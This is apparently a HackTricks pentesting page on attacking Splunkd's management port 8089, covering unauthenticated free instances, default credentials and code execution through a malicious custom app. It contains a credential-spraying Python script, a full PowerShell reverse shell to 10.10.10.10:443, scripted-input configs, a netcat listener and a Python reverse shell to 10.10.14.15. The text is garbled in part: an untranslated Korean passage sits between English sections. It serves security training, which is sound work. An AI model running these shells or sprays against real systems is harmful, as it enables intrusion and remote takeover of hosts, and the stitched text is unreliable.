# 8089 - Pentesting Splunkd

{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)

Support HackTricks

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}

## **Basic Information**

Splunk is a **log analytics tool** used for **data collection, analysis and visualization**. It was not originally designed to be a **SIEM (Security Information and Event Management)** tool, but it became popular for **security monitoring** and **business analytics**. Splunk deployments often hold **sensitive data**, which makes a compromised instance a **valuable source of information** for an attacker.

**Default port:** 8089
```
PORT     STATE SERVICE VERSION
8089/tcp open  http    Splunkd httpd
```
{% hint style="info" %}
By default **Splunk Web runs on port 8000**; 8089 is the splunkd management port, which also serves the REST API.
{% endhint %}

## Enumeration

### Free version

The Splunk Enterprise trial **falls back to the free version after 60 days**, and the free version **does not require authentication**. It is not unusual for a sysadmin to install a Splunk trial to test it and **then forget about it**. The instance silently becomes a free installation with no authentication at all, leaving a hole in the environment. Some organizations also choose the free version for budget reasons without fully understanding what the lack of user/role management implies.

### Default credentials

Older Splunk versions ship with the default credentials **`admin:changeme`**, conveniently displayed on the login page.\
**Recent versions of Splunk** **set the credentials during installation**. If the defaults fail, it is worth trying common weak passwords such as `admin`, `Welcome`, `Welcome1` and `Password123`.

### Obtaining information

Once logged in to Splunk we can **browse the data**, **run reports**, **create dashboards**, **install applications** from the Splunkbase library and install custom applications.\
We can also run code: Splunk offers several ways to **execute code**, such as server-side Django applications, REST endpoints, scripted inputs and alert scripts.
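The two enumeration checks above (is this a free instance that enforces no authentication? do the legacy default or the weak passwords work?) can be run straight against port 8089, because splunkd serves its REST API there: `/services/server/info` reports version and license state, and `/services/auth/login` answers a valid login with a `sessionKey`. The script below is an added example, not code from the page, HackTricks or the HTB module it cites. The target URL is an assumption, and the `SAMPLE_*` responses are constructed (the field names are those of the two endpoints, the build and session-key values are made up) so the parsers run offline.

```python
"""Added example (not from the page, HackTricks or HTB): enumerate a splunkd
management port. Network calls live in probe_server_info()/try_login()/spray();
the parsers are pure and are exercised below on constructed sample responses."""
import base64
import json
import ssl
import urllib.error
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET

# Legacy default plus the weak passwords listed on the page.
DEFAULT_USERS = ["admin"]
WEAK_PASSWORDS = ["changeme", "admin", "Welcome", "Welcome1", "Password123"]


def parse_server_info(body):
    """Pull the interesting fields out of /services/server/info?output_mode=json."""
    content = json.loads(body)["entry"][0]["content"]
    return {
        "version": content.get("version"),
        "build": content.get("build"),
        "os": content.get("os_name"),
        "is_free": bool(content.get("isFree", False)),
        "is_trial": bool(content.get("isTrial", False)),
        "license_state": content.get("licenseState"),
    }


def parse_session_key(body):
    """/services/auth/login returns <response><sessionKey>..</sessionKey></response>
    on success and an HTTP 401 carrying a <messages> element otherwise."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    node = root.find("sessionKey")
    if node is None or not (node.text or "").strip():
        return None
    return node.text.strip()


def _tls_ctx():
    # splunkd listens with a self-signed certificate on 8089.
    return ssl._create_unverified_context()


def probe_server_info(base_url, user=None, password=None, timeout=5):
    """GET server/info. Without credentials this only succeeds when splunkd is
    not enforcing authentication (the free-license case described above).
    Returns (http_status, parsed_dict_or_None)."""
    req = urllib.request.Request(base_url.rstrip("/") + "/services/server/info?output_mode=json")
    if user is not None:
        token = base64.b64encode(f"{user}:{password}".encode()).decode()
        req.add_header("Authorization", "Basic " + token)
    try:
        with urllib.request.urlopen(req, context=_tls_ctx(), timeout=timeout) as resp:
            return resp.status, parse_server_info(resp.read().decode())
    except urllib.error.HTTPError as err:
        return err.code, None


def try_login(base_url, user, password, timeout=5):
    """POST to auth/login; return the sessionKey or None."""
    data = urllib.parse.urlencode({"username": user, "password": password}).encode()
    req = urllib.request.Request(base_url.rstrip("/") + "/services/auth/login", data=data)
    try:
        with urllib.request.urlopen(req, context=_tls_ctx(), timeout=timeout) as resp:
            return parse_session_key(resp.read().decode())
    except urllib.error.HTTPError:
        return None


def spray(base_url, users=DEFAULT_USERS, passwords=WEAK_PASSWORDS):
    """First (user, password, sessionKey) that works, else None. Keep the list
    short: splunkd records every failed login in its _audit index."""
    for user in users:
        for password in passwords:
            key = try_login(base_url, user, password)
            if key:
                return user, password, key
    return None


# Constructed sample responses (not captures); build and sessionKey values are made up.
SAMPLE_INFO = json.dumps({"entry": [{"name": "server-info", "content": {
    "version": "9.1.2", "build": "0123456789ab", "os_name": "Linux",
    "isFree": True, "isTrial": False, "licenseState": "OK"}}]})
SAMPLE_LOGIN_OK = "<response>\n  <sessionKey>0f1e2d3c4b5a69788796a5b4c3d2e1f0</sessionKey>\n</response>"
SAMPLE_LOGIN_FAIL = ('<response><messages><msg type="WARN" '
                     'code="incorrect_username_or_password">Login failed</msg></messages></response>')

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "https://10.10.10.10:8089"  # assumed target
    print("unauthenticated server/info:", probe_server_info(target))
    print("credential spray:", spray(target))
```

Run it as `python3 splunkd_enum.py https://target:8089`. A `200` from the unauthenticated `server/info` request is the free-license signal; a `401` means authentication is enforced and the spray result tells you whether the legacy default or a weak password still gets in.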
Splunk μ„œλ²„μ—μ„œ 원격 μ½”λ“œ 싀행을 μ–»λŠ” 일반적인 방법은 슀크립트 μž…λ ₯을 μ‚¬μš©ν•˜λŠ” κ²ƒμž…λ‹ˆλ‹€. λ˜ν•œ, SplunkλŠ” Windows λ˜λŠ” Linux ν˜ΈμŠ€νŠΈμ— μ„€μΉ˜ν•  수 μžˆμœΌλ―€λ‘œ Bash, PowerShell λ˜λŠ” Batch 슀크립트λ₯Ό μ‹€ν–‰ν•˜κΈ° μœ„ν•΄ 슀크립트 μž…λ ₯을 생성할 수 μžˆμŠ΅λ‹ˆλ‹€. ### Shodan * `Splunk build` ## RCE ### μ‚¬μš©μž μ •μ˜ μ• ν”Œλ¦¬μΌ€μ΄μ…˜ λ§Œλ“€κΈ° μ‚¬μš©μž μ •μ˜ μ• ν”Œλ¦¬μΌ€μ΄μ…˜μ€ **Python, Batch, Bash λ˜λŠ” PowerShell 슀크립트**λ₯Ό μ‹€ν–‰ν•  수 μžˆμŠ΅λ‹ˆλ‹€.\ **Splunkμ—λŠ” Python이 μ„€μΉ˜λ˜μ–΄ μžˆμœΌλ―€λ‘œ**, **Windows** μ‹œμŠ€ν…œμ—μ„œλ„ Python μ½”λ“œλ₯Ό μ‹€ν–‰ν•  수 μžˆμŠ΅λ‹ˆλ‹€. [**이**](https://github.com/0xjpuff/reverse\_shell\_splunk) Splunk νŒ¨ν‚€μ§€λ₯Ό μ‚¬μš©ν•˜μ—¬ 도움을 받을 수 μžˆμŠ΅λ‹ˆλ‹€. 이 λ¦¬ν¬μ§€ν† λ¦¬μ˜ **`bin`** λ””λ ‰ν† λ¦¬μ—λŠ” [Python](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/rev.py) 및 [PowerShell](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/run.ps1) μ˜ˆμ œκ°€ μžˆμŠ΅λ‹ˆλ‹€. λ‹¨κ³„λ³„λ‘œ 진행해 λ³΄κ² μŠ΅λ‹ˆλ‹€. 이λ₯Ό λ‹¬μ„±ν•˜κΈ° μœ„ν•΄, λ¨Όμ € λ‹€μŒ 디렉토리 ꡬ쑰λ₯Ό μ‚¬μš©ν•˜μ—¬ μ‚¬μš©μž μ •μ˜ Splunk μ• ν”Œλ¦¬μΌ€μ΄μ…˜μ„ 생성해야 ν•©λ‹ˆλ‹€: ```shell-session tree splunk_shell/ splunk_shell/ β”œβ”€β”€ bin └── default ``` The **`bin`** λ””λ ‰ν† λ¦¬μ—λŠ” μš°λ¦¬κ°€ μ‹€ν–‰ν•  **슀크립트**κ°€ 포함될 κ²ƒμž…λ‹ˆλ‹€ (이 경우 **PowerShell** λ¦¬λ²„μŠ€ μ…Έ) 및 κΈ°λ³Έ λ””λ ‰ν† λ¦¬μ—λŠ” 우리의 `inputs.conf` 파일이 μžˆμ„ κ²ƒμž…λ‹ˆλ‹€. 
Our reverse shell will be a **PowerShell one-liner**:
```powershell
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
The [inputs.conf](https://docs.splunk.com/Documentation/Splunk/latest/Admin/Inputsconf) file tells Splunk **which script to run** and under what conditions. Here we enable the input (`disabled = 0`) and tell Splunk to run the script every 10 seconds. The interval is given in seconds (a cron schedule is also accepted); if it is omitted Splunk falls back to its default schedule, so set it explicitly to get a prompt callback.
```shell-session
cat inputs.conf

[script://./bin/rev.py]
disabled = 0
interval = 10
sourcetype = shell

[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10
```
On Windows we need a `.bat` file that runs when the application is deployed and launches the PowerShell one-liner.

The next step is to choose `Install app from file` and upload the application.
Before uploading the malicious custom app, start a listener with Netcat or [socat](https://linux.die.net/man/1/socat).
```shell-session
sudo nc -lnvp 443

listening on [any] 443 ...
```
On the `Upload app` page, click browse, choose the tarball of the `splunk_shell/` directory and click `Upload`. **As soon as the application is uploaded** the **reverse shell comes in**, because the application's status is automatically switched to `Enabled`.

#### Linux

If the target is a **Linux host**, **edit the `rev.py` Python script** before creating the tarball and uploading the custom malicious app. The rest of the process is the same: the reverse shell lands on the Netcat listener.
```python
import sys,socket,os,pty
ip="10.10.14.15"   # attacker IP
port="443"         # listener port
s=socket.socket()
s.connect((ip,int(port)))
# point stdin/stdout/stderr at the socket, then hand over an interactive bash
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn('/bin/bash')
```

### RCE & Privilege Escalation

The following page explains how this service can be abused to escalate privileges and obtain persistence:

{% content-ref url="../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md" %}
[splunk-lpe-and-persistence.md](../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md)
{% endcontent-ref %}

## References

* [https://academy.hackthebox.com/module/113/section/1213](https://academy.hackthebox.com/module/113/section/1213)